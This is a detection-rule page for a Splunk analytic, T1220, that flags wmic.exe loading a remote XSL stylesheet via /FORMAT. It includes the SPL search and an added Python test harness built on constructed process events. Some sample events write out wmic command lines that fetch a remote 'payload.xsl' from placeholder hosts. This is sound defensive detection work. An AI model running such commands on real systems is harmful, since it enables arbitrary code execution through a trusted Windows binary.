Techniques
Sample rules
WMIC XSL Execution via URL
- source: splunk
- techniques:
  - T1220
Description
The following analytic detects wmic.exe loading a remote XSL stylesheet from a URL supplied to
the /FORMAT switch. It uses Endpoint Detection and Response (EDR) process-execution telemetry
mapped to the Endpoint.Processes data model and matches command lines that contain both an
HTTP/HTTPS URL and the /FORMAT switch. The activity is significant because it is an application
control bypass: wmic.exe is a signed, trusted Windows binary, and an XSL stylesheet can embed
JScript or VBScript that its built-in XSL processor executes. If confirmed malicious, the
technique lets an attacker execute arbitrary code, escalate privileges, or maintain persistence
through a trusted Windows tool, posing a severe threat to the environment. Legitimate use of
/FORMAT with a remote URL is rare; the built-in formatters (for example /format:csv or
/format:list) and local .xsl paths contain no URL and do not match this search.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where
`process_wmic`
Processes.process IN ("*http://*", "*https://*")
Processes.process="*/format:*"
by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path Processes.process
Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `wmic_xsl_execution_via_url_filter`
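The following is an added example, not code from the original page or from Splunk security content: a small Python re-implementation of the search above run over constructed process-creation records, so the filter and the aggregation can be checked offline. It assumes that the `process_wmic` macro matches on either process_name or original_file_name being wmic.exe (so a renamed copy of the binary still qualifies), and the sample events, hostnames and URLs are made up for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, shaped like the Endpoint.Processes fields the analytic uses."""
    time: int              # epoch seconds (_time)
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    original_file_name: str
    process: str           # full command line


# Constructed sample telemetry for this example (not real EDR output).
SAMPLE_EVENTS = [
    ProcessEvent(1700000000, "ws01", "CORP\\alice", "cmd.exe", "wmic.exe", "wmic.exe",
                 'wmic os get /FORMAT:"https://example.invalid/payload.xsl"'),
    # same command again one minute later: should fold into one row with count=2
    ProcessEvent(1700000060, "ws01", "CORP\\alice", "cmd.exe", "wmic.exe", "wmic.exe",
                 'wmic os get /FORMAT:"https://example.invalid/payload.xsl"'),
    # wmic.exe copied under another name: process_name differs, original_file_name does not
    ProcessEvent(1700000120, "ws02", "CORP\\bob", "powershell.exe", "updater.exe", "wmic.exe",
                 'updater.exe process list /format:http://example.invalid/list.xsl'),
    # benign: built-in formatter, no URL
    ProcessEvent(1700000180, "ws03", "CORP\\carol", "cmd.exe", "wmic.exe", "wmic.exe",
                 'wmic /format:csv os get caption'),
    # URL present but no /format: switch
    ProcessEvent(1700000240, "ws04", "CORP\\dave", "explorer.exe", "wmic.exe", "wmic.exe",
                 'wmic process call create "https://intranet.invalid/app.exe"'),
    # URL and the literal /format: but not wmic at all
    ProcessEvent(1700000300, "ws05", "CORP\\erin", "cmd.exe", "curl.exe", "curl.exe",
                 'curl https://example.invalid/format:xsl'),
]

# wmic accepts the switch in any letter case, so match case-insensitively.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
FORMAT_RE = re.compile(r"/format:", re.IGNORECASE)


def is_wmic(ev: ProcessEvent) -> bool:
    """Stand-in for the `process_wmic` macro. Assumption: it matches on process_name OR
    original_file_name, so a renamed copy of wmic.exe still qualifies."""
    return "wmic.exe" in (ev.process_name.lower(), ev.original_file_name.lower())


def matches(ev: ProcessEvent) -> bool:
    """The where clause: wmic, an http/https URL, and the /format: switch on one command line."""
    return is_wmic(ev) and bool(URL_RE.search(ev.process)) and bool(FORMAT_RE.search(ev.process))


def run_detection(events):
    """Apply the filter, then aggregate like the `by` clause: count, firstTime and lastTime
    per (dest, user, parent_process_name, process). Returns rows sorted by firstTime."""
    groups = {}
    for ev in events:
        if not matches(ev):
            continue
        key = (ev.dest, ev.user, ev.parent_process_name, ev.process)
        row = groups.setdefault(key, {
            "dest": ev.dest, "user": ev.user,
            "parent_process_name": ev.parent_process_name,
            "process": ev.process, "count": 0,
            "firstTime": ev.time, "lastTime": ev.time,
        })
        row["count"] += 1
        row["firstTime"] = min(row["firstTime"], ev.time)
        row["lastTime"] = max(row["lastTime"], ev.time)
    return sorted(groups.values(), key=lambda r: r["firstTime"])


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(f'{hit["dest"]} {hit["user"]} count={hit["count"]} '
              f'parent={hit["parent_process_name"]} :: {hit["process"]}')
```

Running it yields two rows: ws01 with count=2 (the repeated command folded by the group-by) and the renamed binary on ws02, while the built-in csv formatter, the URL without /format:, and the non-wmic process all drop out. The two negatives that contain a URL are the useful ones to keep in a test set: they confirm that each of the three conditions is doing work. The trailing `wmic_xsl_execution_via_url_filter` macro in the original search is the usual Splunk security content tuning hook and is where any environment-specific exclusions belong, rather than in the where clause.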